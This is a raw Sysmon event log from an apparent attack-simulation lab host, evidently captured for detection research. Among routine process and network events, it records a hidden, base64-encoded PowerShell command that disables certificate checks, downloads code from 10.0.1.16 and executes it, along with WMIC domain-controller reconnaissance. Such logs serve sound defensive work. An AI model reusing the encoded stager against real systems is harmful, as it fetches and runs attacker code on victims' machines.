18:16:13.394{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.394{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.394{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.394{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.394{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.393{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exe"C:\Windows\System32\Wbem\WMIC.exe" NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUEC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 10341000x800000000000000035085545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.241{B81B27B7-4F6D-613A-6890-03000000C801}32725172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.077{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F6D-613A-6890-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.075{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.075{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.075{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.075{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.074{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F6D-613A-6890-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.074{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F6D-613A-6890-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.057{B81B27B7-4F6D-613A-6890-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F82C5A906A6FB55DDD98CA5B143FF7DA,SHA256=25B6C96BB940A1CAFF07376290AB28743AA4A91A15D6CC6A1B7E67F3C55D9128,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.524{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=28C625A2B09F0AA6CF8C51A99ABAAD12,SHA256=C5057ED392F3906499B55A1656BC066DB2B9D975CCEE2642F3269731D73672DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.078{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1483593A7373814A26727C41B71045F6,SHA256=050B81DC7C4BBF90F584871E3BFA609B9FB162C5520189172A23543D85FE9470,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.078{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD5B895AC67543025E79FC5EE3838257,SHA256=873E470E1708C38C244BCF25D1D71F457BD79DAA199D1027CFBCCD208E6B29FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:15.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED4047930415B58EA941C5D7DBC4587F,SHA256=86AD96A325F3B39C36B360E306BCB3C38ABD9BCEA20F81BC21067285B2C70060,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.472{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:3433:3933:28d1:a286:81df:ffff-58711-truea00:10e:81df:ffff:31e:b81f:1f8:ffff-53domain 354300x800000000000000035085573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.397{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56745-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035085572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.181{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56744-false10.0.1.12-8000- 23542300x800000000000000035085579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:16.629{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8C9131A5AE6620FCF62A757939CEA1C,SHA256=191198D0C00ED1B63E8677A7137C6A1F77C194120BB51CEB5C263FA7041BD27A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.597{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:3433:3933:28d1:a286:81df:ffff-52953-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x800000000000000035085577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.597{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:7073:809d:70b7:7bb9win-host-987.attackrange.local52953-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x800000000000000035085576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.472{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-987.attackrange.local58711-false10.0.1.14WIN-DC-12853domain 23542300x800000000000000035085580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:17.644{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F21D976FE632464564EF7B91E331E1C4,SHA256=BCDC857AB59825363359D285E2CBBC26E4413B361FB3BD1A24A94F38FFE1E74F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:18.681{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A53F8B224883CBAD81B0D5404E834CD5,SHA256=E4E6E959510C9BA27E532166AC9320CCB8FAD702755E9A74C4A0C4EF1004412B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:19.716{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2959BA76085E8688332D1ADC3A1C87E2,SHA256=6C37598E2D1BC2E4CDF979BDE7D4DD570A26A30DC1EBF6541A92A4B79ECB4C2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:20.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A05D954FE74BCD170C61C0800E8104CB,SHA256=076380D814A743D2EE35C3634B26123AD2CB05F8E1F0805BEBD26FEDF96695E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.893{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5E6A871191C491E6FEABBA0CCBDC3E4A,SHA256=EF6B9E97EBB4A5A317261DEC60D7B09E081609EF6A882C87C361363D2D4EE7D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EECFF4D204267A8CC3C374D9D405C25,SHA256=26E2354B806C09DAF9284F6C6C1F1CB678952B6670E89DF0293440956837A8A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51AE5CAD281C1F2CF0EE2B5E13361573,SHA256=0A057DF35C5FBF8E19CA680547FBD7D82F4B8AF4051CB4CC8D8B078AC7BE9AC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 